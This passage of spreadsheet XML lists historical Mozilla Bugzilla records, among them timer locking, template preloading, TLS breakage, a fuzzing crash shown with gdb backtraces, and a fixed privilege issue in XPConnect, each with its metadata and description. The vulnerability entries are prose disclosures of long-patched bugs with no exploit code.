      <c r="I5655" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5655" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K5655" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5655" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5655" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5655" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5655" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5655" t="inlineStr">
        <is>
          <t>[adv-main40+][adv-esr38.2+]</t>
        </is>
      </c>
      <c r="Q5655" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5655" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5655" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T5655" t="n">
        <v>1</v>
      </c>
      <c r="U5655" t="n">
        <v>0</v>
      </c>
      <c r="V5655" t="n">
        <v>63</v>
      </c>
      <c r="W5655" t="inlineStr">
        <is>
          <t>TimerThread::DoAfterSleep() iterates over mTimers without any locking, updating timeouts. Any insertions of new timers (or canceling/rescheduling) is likely to go awry if DoAfterSleep is running.
I need to verify that this function is ever called, since dxr doesn't seem to know about any callers.</t>
        </is>
      </c>
      <c r="X5655" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5656">
      <c r="A5656" t="n">
        <v>1352264</v>
      </c>
      <c r="B5656" t="inlineStr">
        <is>
          <t>2017-03-30 16:49:23 -0700</t>
        </is>
      </c>
      <c r="C5656" t="inlineStr">
        <is>
          <t>Preload all templates</t>
        </is>
      </c>
      <c r="D5656" t="inlineStr">
        <is>
          <t>2017-05-30 10:29:51 -0700</t>
        </is>
      </c>
      <c r="E5656" t="n">
        <v>1</v>
      </c>
      <c r="F5656" t="n">
        <v>1</v>
      </c>
      <c r="G5656" t="n">
        <v>7</v>
      </c>
      <c r="H5656" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5656" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J5656" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5656" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L5656" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5656" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5656" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5656" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5656" t="inlineStr"/>
      <c r="Q5656" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5656" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5656" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5656" t="n">
        <v>1</v>
      </c>
      <c r="U5656" t="n">
        <v>0</v>
      </c>
      <c r="V5656" t="n">
        <v>13</v>
      </c>
      <c r="W5656" t="inlineStr">
        <is>
          <t>The template provider is loaded in each worker, so each worker ends up stat'ing the same files. Eventually each worker has loaded every template, only to repeat this again. There are really not that many templates.
With this and the .htaccess thing, a running bugzilla only runs stat() about once per request.</t>
        </is>
      </c>
      <c r="X5656" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5657">
      <c r="A5657" t="n">
        <v>754517</v>
      </c>
      <c r="B5657" t="inlineStr">
        <is>
          <t>2012-05-11 19:40:37 -0700</t>
        </is>
      </c>
      <c r="C5657" t="inlineStr">
        <is>
          <t>Do something about having let the Pine twig be booked while it's disabled for MAX_BROKER_REFS shortage</t>
        </is>
      </c>
      <c r="D5657" t="inlineStr">
        <is>
          <t>2017-05-08 09:48:46 -0700</t>
        </is>
      </c>
      <c r="E5657" t="n">
        <v>1</v>
      </c>
      <c r="F5657" t="n">
        <v>1</v>
      </c>
      <c r="G5657" t="n">
        <v>5</v>
      </c>
      <c r="H5657" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5657" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5657" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5657" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5657" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5657" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5657" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5657" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5657" t="inlineStr"/>
      <c r="Q5657" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5657" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5657" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5657" t="n">
        <v>1</v>
      </c>
      <c r="U5657" t="n">
        <v>0</v>
      </c>
      <c r="V5657" t="n">
        <v>7</v>
      </c>
      <c r="W5657" t="inlineStr">
        <is>
          <t>Oopsie. Last time we were desperate to get some headroom under MAX_BROKER_REFS, we commented Pine out of configs, which was fine except for the way we apparently didn't think to mark it as booked, so now anant is wonder why, after he followed all the instructions to book the twig and get the repo reset, he isn't getting any builds or tests run.
My (outside watcher, not employee, not insider) feeling is that we're still desperately short, and that if we had enough room which we don't Alder is first in line, because it has been wanting tests turned on and been unable to get them for a while now, so the only open course of action is to quickly grab another twig before the open ones get booked. You can see (once bitten, twice shy) from http://mxr.mozilla.org/build/source/buildbot-configs/mozilla/project_branches.py#261 that only Pine is commented out, but personally unless I was going to be doing mobile nightly update testing I'd take Larch rather than Maple, which still hasn't been uncustomized from when it was the Android native trunk.</t>
        </is>
      </c>
      <c r="X5657" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5658">
      <c r="A5658" t="n">
        <v>85304</v>
      </c>
      <c r="B5658" t="inlineStr">
        <is>
          <t>2001-06-11 15:27:25 -0700</t>
        </is>
      </c>
      <c r="C5658" t="inlineStr">
        <is>
          <t>TLS support broken in mozilla</t>
        </is>
      </c>
      <c r="D5658" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E5658" t="n">
        <v>1</v>
      </c>
      <c r="F5658" t="n">
        <v>1</v>
      </c>
      <c r="G5658" t="n">
        <v>6</v>
      </c>
      <c r="H5658" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5658" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5658" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K5658" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L5658" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5658" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N5658" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5658" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5658" t="inlineStr"/>
      <c r="Q5658" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5658" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5658" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5658" t="n">
        <v>1</v>
      </c>
      <c r="U5658" t="n">
        <v>0</v>
      </c>
      <c r="V5658" t="n">
        <v>33</v>
      </c>
      <c r="W5658" t="inlineStr">
        <is>
          <t>Sometime within the last week or so the TSL socket provided by PSM broke. This
prevents users from sending mail using SSL (which is currently the default in
mailnews so we are getting tons of complaints about this because people can't
send their email). 
Necko is properly invoking the TSL socket. However, we never receive an
OnStartRequest from the tsl socket. 
Also, it appears that mozilla is incapable of any networking activity after we
create a TLS socket. Something is causing everything to get blocked. Seems
strange that psm could cause the necko threads to block.</t>
        </is>
      </c>
      <c r="X5658" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5659">
      <c r="A5659" t="n">
        <v>834240</v>
      </c>
      <c r="B5659" t="inlineStr">
        <is>
          <t>2013-01-24 07:21:05 -0800</t>
        </is>
      </c>
      <c r="C5659" t="inlineStr">
        <is>
          <t>Crash [@ sizeOfThis] or Crash [@ CheckMarkedThing] due to OOM</t>
        </is>
      </c>
      <c r="D5659" t="inlineStr">
        <is>
          <t>2013-11-25 13:27:14 -0800</t>
        </is>
      </c>
      <c r="E5659" t="n">
        <v>1</v>
      </c>
      <c r="F5659" t="n">
        <v>1</v>
      </c>
      <c r="G5659" t="n">
        <v>3</v>
      </c>
      <c r="H5659" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5659" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5659" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5659" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5659" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5659" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5659" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5659" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5659" t="inlineStr">
        <is>
          <t>[adv-main20+][adv-esr1705+]</t>
        </is>
      </c>
      <c r="Q5659" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5659" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5659" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T5659" t="n">
        <v>1</v>
      </c>
      <c r="U5659" t="n">
        <v>0</v>
      </c>
      <c r="V5659" t="n">
        <v>24</v>
      </c>
      <c r="W5659" t="inlineStr">
        <is>
          <t>During fuzzing I found the following crash on mozilla-central revision 98ea4d294369:
Program received signal SIGSEGV, Segmentation fault.
sizeOfThis (this=0xfff9800000000001) at /srv/repos/mozilla-central/js/src/vm/ObjectImpl-inl.h:370
370         return arenaHeader()-&gt;getThingSize();
(gdb) bt
#0  sizeOfThis (this=0xfff9800000000001) at /srv/repos/mozilla-central/js/src/vm/ObjectImpl-inl.h:370
#1  copyCachedToObject (src=(JSObject *) 0x7ffff7e53fd0 [object Object], dst=(JSObject *) 0xfff9800000000001 Cannot access memory at address 0xfff9800000000001)
    at /srv/repos/mozilla-central/js/src/jsobjinlines.h:1499
#2  newObjectFromHit (entry_=2, cx=&lt;optimized out&gt;, this=0x7ffff7e53e48) at ../jscntxtinlines.h:111
#3  js::NewObjectWithType (cx=&lt;optimized out&gt;, type=0x7ffff671d850, parent=(JSObject *) 0x7ffff6720060 [object global] delegate, kind=js::gc::FINALIZE_OBJECT4_BACKGROUND)
    at /srv/repos/mozilla-central/js/src/jsobj.cpp:1307
#4  0x00000000004c0509 in CreateThisForFunctionWithType (parent=&lt;optimized out&gt;, type=0x7ffff671d850, cx=0xadd640) at /srv/repos/mozilla-central/js/src/jsobj.cpp:1415
#5  js_CreateThisForFunctionWithProto (cx=0xadd640, callee=(JSObject * const) 0x7ffff672dec0 [object Function "TestCase"], proto=&lt;optimized out&gt;) at /srv/repos/mozilla-central/js/src/jsobj.cpp:1427
#6  0x00000000004c08cf in js_CreateThisForFunction (cx=0xadd640, callee=(JSObject * const) 0x7ffff672dec0 [object Function "TestCase"], newType=false) at /srv/repos/mozilla-central/js/src/jsobj.cpp:1452
#7  0x000000000069833d in js::ion::CanEnter (cx=0xadd640, script=0x7ffff6724310, fp=0x7ffff69941e8, newType=&lt;optimized out&gt;) at /srv/repos/mozilla-central/js/src/ion/Ion.cpp:1461
#8  0x0000000000497e6c in js::Interpret (cx=0xadd640, entryFrame=0x7ffff6994150, interpMode=js::JSINTERP_NORMAL) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:2411
#9  0x000000000049dbfb in js::RunScript (cx=0xadd640, script=0x7ffff6736480, fp=0x7ffff6994150) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:348
#10 0x000000000049de55 in js::ExecuteKernel (cx=0xadd640, script=0x7ffff6736480, scopeChain=..., thisv=..., type=&lt;optimized out&gt;, evalInFrame=..., result=0x7ffff6994128)
    at /srv/repos/mozilla-central/js/src/jsinterp.cpp:537
#11 0x00000000005dd5be in EvalKernel (cx=&lt;optimized out&gt;, args=..., evalType=&lt;optimized out&gt;, caller=..., scopeobj=(JSObject * const) 0x7ffff673ba00 [object Call] delegate)
    at /srv/repos/mozilla-central/js/src/builtin/Eval.cpp:286
#12 0x00000000005de6cd in js::DirectEval (cx=0xadd640, args=...) at /srv/repos/mozilla-central/js/src/builtin/Eval.cpp:337
#13 0x000000000049816c in js::Interpret (cx=0xadd640, entryFrame=0x7ffff69940b8, interpMode=js::JSINTERP_NORMAL) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:2334
#14 0x000000000049dbfb in js::RunScript (cx=0xadd640, script=0x7ffff6736310, fp=0x7ffff69940b8) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:348
#15 0x000000000049e1ed in js::InvokeKernel (cx=0xadd640, args=..., construct=js::NO_CONSTRUCT) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:406
#16 0x000000000049e812 in Invoke (construct=js::NO_CONSTRUCT, args=..., cx=0xadd640) at /srv/repos/mozilla-central/js/src/jsinterp.h:131
#17 js::Invoke (cx=0xadd640, thisv=..., fval=..., argc=1, argv=&lt;optimized out&gt;, rval=0x7fffffffce98) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:439
#18 0x000000000071e4e6 in js::ion::InvokeFunction (cx=0xadd640, fun0=..., argc=1, argv=0x7fffffffced8, rval=0x7fffffffce98) at /srv/repos/mozilla-central/js/src/ion/VMFunctions.cpp:108
#19 0x00007ffff7e1ee7e in ?? ()
#20 0x0000000000000000 in ?? ()
The crash is due to out-of-memory, and the test is still quite complex, so I was hoping it can be resolved without the test. I took a backtrace from where OOM is reported before the crash:
Breakpoint 1, js_ReportOutOfMemory (cx=0xadd640) at /srv/repos/mozilla-central/js/src/jscntxt.cpp:511
511     {
(gdb) bt
#0  js_ReportOutOfMemory (cx=0xadd640) at /srv/repos/mozilla-central/js/src/jscntxt.cpp:511
#1  0x0000000000474ba7 in js::gc::ArenaLists::refillFreeList (cx=&lt;optimized out&gt;, thingKind=&lt;optimized out&gt;) at /srv/repos/mozilla-central/js/src/jsgc.cpp:1504
#2  0x00000000004b00d0 in NewGCThing&lt;JSObject&gt; (kind=js::gc::FINALIZE_OBJECT16_BACKGROUND, cx=0xadd640, thingSize=&lt;optimized out&gt;) at ../jsgcinlines.h:505
#3  js_NewGCObject (kind=js::gc::FINALIZE_OBJECT16_BACKGROUND, cx=0xadd640) at ../jsgcinlines.h:584
#4  create (slots=&lt;optimized out&gt;, type=0x7ffff671d0a0, shape=&lt;optimized out&gt;, kind=js::gc::FINALIZE_OBJECT16_BACKGROUND, cx=0xadd640) at /srv/repos/mozilla-central/js/src/jsobjinlines.h:972
#5  NewObject (cx=0xadd640, clasp=0xa978a0, type_=0x7ffff671d0a0, parent=&lt;optimized out&gt;, kind=js::gc::FINALIZE_OBJECT16_BACKGROUND) at /srv/repos/mozilla-central/js/src/jsobj.cpp:1174
#6  0x00000000004bab8a in NewObjectWithClassProto (kind=js::gc::FINALIZE_OBJECT16_BACKGROUND, parent_=&lt;optimized out&gt;, proto_=0x0, clasp=0xa978a0, cx=0xadd640) at /srv/repos/mozilla-central/js/src/jsobj.cpp:1282
#7  js::NewObjectWithClassProto (cx=0xadd640, clasp=0xa978a0, proto_=&lt;optimized out&gt;, parent_=&lt;optimized out&gt;, kind=&lt;optimized out&gt;) at /srv/repos/mozilla-central/js/src/jsobj.cpp:1238
#8  0x000000000048a0d7 in NewBuiltinClassInstance (kind=js::gc::FINALIZE_OBJECT16, clasp=&lt;optimized out&gt;, cx=0xadd640) at ../jsobjinlines.h:1598
#9  CheckNewScriptProperties (cx=0xadd640, type=0x7ffff671d850, fun=...) at /srv/repos/mozilla-central/js/src/jsinfer.cpp:5132
#10 0x000000000048a59b in js::types::HeapTypeSet::isOwnProperty (this=0xb46e08, cx=0xadd640, object=&lt;optimized out&gt;, configurable=true) at /srv/repos/mozilla-central/js/src/jsinfer.cpp:1897
#11 0x00000000006b5535 in GetDefiniteSlot (atom=&lt;optimized out&gt;, types=0xb29568, cx=&lt;optimized out&gt;) at /srv/repos/mozilla-central/js/src/ion/IonBuilder.cpp:5781
#12 js::ion::IonBuilder::jsop_setprop (this=0xaf1e98, name="type") at /srv/repos/mozilla-central/js/src/ion/IonBuilder.cpp:6476
#13 0x00000000006bb172 in js::ion::IonBuilder::inspectOpcode (this=0xaf1e98, op=&lt;optimized out&gt;) at /srv/repos/mozilla-central/js/src/ion/IonBuilder.cpp:1051
#14 0x00000000006b9321 in js::ion::IonBuilder::traverseBytecode (this=0xaf1e98) at /srv/repos/mozilla-central/js/src/ion/IonBuilder.cpp:688
#15 0x00000000006bbedc in js::ion::IonBuilder::build (this=0xaf1e98) at /srv/repos/mozilla-central/js/src/ion/IonBuilder.cpp:341
#16 0x0000000000696d21 in js::ion::SequentialCompileContext::compile (this=&lt;optimized out&gt;, builder=&lt;optimized out&gt;, graph=&lt;optimized out&gt;, autoDelete=...) at /srv/repos/mozilla-central/js/src/ion/Ion.cpp:1190
#17 0x000000000069770d in js::ion::IonCompile&lt;js::ion::SequentialCompileContext&gt; (cx=0xadd640, script=..., fun=(JSFunction * const) 0xae4a40 Cannot access memory at address 0x1501800000000, osrPc=0xaebde0 "", 
    constructing=true, compileContext=...) at /srv/repos/mozilla-central/js/src/ion/Ion.cpp:1151
#18 0x0000000000697b83 in js::ion::Compile (cx=&lt;optimized out&gt;, script=0x7ffff6724310, fun=..., osrPc=&lt;optimized out&gt;, constructing=&lt;optimized out&gt;) at /srv/repos/mozilla-central/js/src/ion/Ion.cpp:1383
#19 0x0000000000698299 in js::ion::CanEnter (cx=0xadd640, script=0x7ffff6724310, fp=0x7ffff69941e8, newType=&lt;optimized out&gt;) at /srv/repos/mozilla-central/js/src/ion/Ion.cpp:1475
#20 0x0000000000497e6c in js::Interpret (cx=0xadd640, entryFrame=0x7ffff6994150, interpMode=js::JSINTERP_NORMAL) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:2411
#21 0x000000000049dbfb in js::RunScript (cx=0xadd640, script=0x7ffff6736480, fp=0x7ffff6994150) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:348
#22 0x000000000049de55 in js::ExecuteKernel (cx=0xadd640, script=0x7ffff6736480, scopeChain=..., thisv=..., type=&lt;optimized out&gt;, evalInFrame=..., result=0x7ffff6994128)
    at /srv/repos/mozilla-central/js/src/jsinterp.cpp:537
#23 0x00000000005dd5be in EvalKernel (cx=&lt;optimized out&gt;, args=..., evalType=&lt;optimized out&gt;, caller=..., scopeobj=(JSObject * const) 0x7ffff673ba00 [object Call] delegate)
    at /srv/repos/mozilla-central/js/src/builtin/Eval.cpp:286
#24 0x00000000005de6cd in js::DirectEval (cx=0xadd640, args=...) at /srv/repos/mozilla-central/js/src/builtin/Eval.cpp:337
#25 0x000000000049816c in js::Interpret (cx=0xadd640, entryFrame=0x7ffff69940b8, interpMode=js::JSINTERP_NORMAL) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:2334
#26 0x000000000049dbfb in js::RunScript (cx=0xadd640, script=0x7ffff6736310, fp=0x7ffff69940b8) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:348
#27 0x000000000049e1ed in js::InvokeKernel (cx=0xadd640, args=..., construct=js::NO_CONSTRUCT) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:406
#28 0x000000000049e812 in Invoke (construct=js::NO_CONSTRUCT, args=..., cx=0xadd640) at /srv/repos/mozilla-central/js/src/jsinterp.h:131
#29 js::Invoke (cx=0xadd640, thisv=..., fval=..., argc=1, argv=&lt;optimized out&gt;, rval=0x7fffffffce98) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:439
#30 0x000000000071e4e6 in js::ion::InvokeFunction (cx=0xadd640, fun0=..., argc=1, argv=0x7fffffffced8, rval=0x7fffffffce98) at /srv/repos/mozilla-central/js/src/ion/VMFunctions.cpp:108
#31 0x00007ffff7e1ee7e in ?? ()
#32 0x0000000000000000 in ?? ()
Now checking this trace, frame #10 does a call that is infallible:
&gt; CheckNewScriptProperties(cx, typeObj, fun);
in js/src/jsinfer.cpp around line 1897. Not sure if this is the reason/cause for the problem. Maybe someone with more experience in that code can check. Marking s-s because the crash doesn't look safe.</t>
        </is>
      </c>
      <c r="X5659" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5660">
      <c r="A5660" t="n">
        <v>853709</v>
      </c>
      <c r="B5660" t="inlineStr">
        <is>
          <t>2013-03-21 19:12:28 -0700</t>
        </is>
      </c>
      <c r="C5660" t="inlineStr">
        <is>
          <t>Its possible to call a content level constructor as if from a chrome/privileged page</t>
        </is>
      </c>
      <c r="D5660" t="inlineStr">
        <is>
          <t>2024-05-30 08:01:29 -0700</t>
        </is>
      </c>
      <c r="E5660" t="n">
        <v>1</v>
      </c>
      <c r="F5660" t="n">
        <v>1</v>
      </c>
      <c r="G5660" t="n">
        <v>3</v>
      </c>
      <c r="H5660" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5660" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5660" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5660" t="inlineStr">
        <is>
          <t>19 Branch</t>
        </is>
      </c>
      <c r="L5660" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5660" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5660" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5660" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5660" t="inlineStr">
        <is>
          <t>[adv-main21+][adv-esr1706+][adv-main35-]</t>
        </is>
      </c>
      <c r="Q5660" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5660" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5660" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T5660" t="n">
        <v>1</v>
      </c>
      <c r="U5660" t="n">
        <v>0</v>
      </c>
      <c r="V5660" t="n">
        <v>27</v>
      </c>
      <c r="W5660" t="inlineStr">
        <is>
          <t>Created attachment 728007
ccpoc.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Build ID: 20130307023931
Steps to reproduce:
I used the mozContact constructor to gain access to a chrome level array and then added a content level constructor to it and defined a setter to do the calling for me.
Actual results:
The content level constructor behaves as if called from a privileged page as shown from the error, this works with most content level constructors(that are function objects) but using the File constructor was just the easiest way to show this off.  I had discussed this issue in passing in an email with Bobby Holly but hadn't had an easy way to show it off.
Expected results:
Chrome level Objects exposed to content should be careful about any properties that are 'rw' as defined in __exposedProps__, I think it may be best to avoid it at all if possible.  Arrays from chrome and the normal COWs(this works with them too) are going to have to be rethought.  This happens I believe because Function Objects inherit their principals from the nearest Object in the scope of their execution.</t>
        </is>
      </c>
      <c r="X5660" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5661">
      <c r="A5661" t="n">
        <v>856267</v>
      </c>
      <c r="B5661" t="inlineStr">
        <is>
          <t>2013-03-29 20:53:51 -0700</t>
        </is>
      </c>
      <c r="C5661" t="inlineStr">
        <is>
          <t>Defect - Context Menu overlapping with the Tab App Bar when visible</t>
        </is>
      </c>
      <c r="D5661" t="inlineStr">
        <is>
          <t>2014-07-24 11:06:19 -0700</t>
        </is>
      </c>
      <c r="E5661" t="n">
        <v>1</v>
      </c>
      <c r="F5661" t="n">
        <v>1</v>
      </c>
      <c r="G5661" t="n">
        <v>6</v>
      </c>
      <c r="H5661" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5661" t="inlineStr">
        <is>
          <t>Firefox for Metro Graveyard</t>
        </is>
      </c>
      <c r="J5661" t="inlineStr">
        <is>
          <t>Input</t>
        </is>
      </c>
      <c r="K5661" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5661" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5661" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N5661" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5661" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5661" t="inlineStr">
        <is>
          <t>feature=defect c=context_menus u=metro_firefox_user p=1</t>
        </is>
      </c>
      <c r="Q5661" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5661" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5661" t="inlineStr">
        <is>
          <t>Firefox 23</t>
        </is>
      </c>
      <c r="T5661" t="n">
        <v>1</v>
      </c>
      <c r="U5661" t="n">
        <v>0</v>
      </c>
      <c r="V5661" t="n">
        <v>18</v>
      </c>
      <c r="W5661" t="inlineStr">
        <is>
          <t>If a context menu is visible at the top, it will overlap with the tab app bar.
Steps to reproduce the issue:
1) Open Firefox Metro
2) Go to mozilla.org
3) Tap and hold on the "Mission" link at the top of the page (a context menu should appear)
4) Once the context menu is visible near the top of the page, slide in the tab app bar
Current Behavior:
- The context menu will be displayed at the top of the tab app bar. Context Menu overlaps the tab app bar
Expected Behavior:
- Either the context menu is dismissed when a user slides in the tab app bar or its moved down with the web page. I think dismissing it is probably the better route</t>
        </is>
      </c>
      <c r="X5661" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5662">
      <c r="A5662" t="n">
        <v>1308970</v>
      </c>
      <c r="B5662" t="inlineStr">
        <is>
          <t>2016-10-10 09:45:02 -0700</t>
        </is>
      </c>
      <c r="C5662" t="inlineStr">
        <is>
          <t>Switch RDS slow query log_output from TABLE to FILE</t>
        </is>
      </c>
      <c r="D5662" t="inlineStr">
        <is>
          <t>2016-10-11 09:11:10 -0700</t>
        </is>
      </c>
      <c r="E5662" t="n">
        <v>1</v>
      </c>
      <c r="F5662" t="n">
        <v>1</v>
      </c>
      <c r="G5662" t="n">
        <v>7</v>
      </c>
      <c r="H5662" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5662" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5662" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K5662" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5662" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5662" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5662" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5662" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5662" t="inlineStr"/>
      <c r="Q5662" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5662" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5662" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5662" t="n">
        <v>1</v>
      </c>
      <c r="U5662" t="n">
        <v>0</v>
      </c>
      <c r="V5662" t="n">
        <v>4</v>
      </c>
      <c r="W5662" t="inlineStr">
        <is>
          <t>On RDS, `log_output` (http://dev.mysql.com/doc/refman/5.6/en/server-system-variables.html#sysvar_log_output) defaults to TABLE:
http://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_LogAccess.Concepts.MySQL.html
RDS supports FILE (https://aws.amazon.com/blogs/aws/amazon-rds-access-to-database-log-files/), so we should switch to it, to reduce writes to the DB, and to also benefit from the slightly more aggressive rotation, to avoid perf degradation in the case of many slow queries having been logged.</t>
        </is>
      </c>
      <c r="X5662" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5663">
      <c r="A5663" t="n">
        <v>1216837</v>
      </c>
      <c r="B5663" t="inlineStr">
        <is>
          <t>2015-10-20 18:13:08 -0700</t>
        </is>
      </c>
      <c r="C5663" t="inlineStr">
        <is>
          <t>Underflow in srtp_unprotect could cause memory-safety bug</t>
        </is>
      </c>
      <c r="D5663" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:29 -0700</t>
        </is>
      </c>
      <c r="E5663" t="n">
        <v>1</v>
      </c>
      <c r="F5663" t="n">
        <v>1</v>
      </c>
      <c r="G5663" t="n">
        <v>3</v>
      </c>
      <c r="H5663" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5663" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5663" t="inlineStr">
        <is>
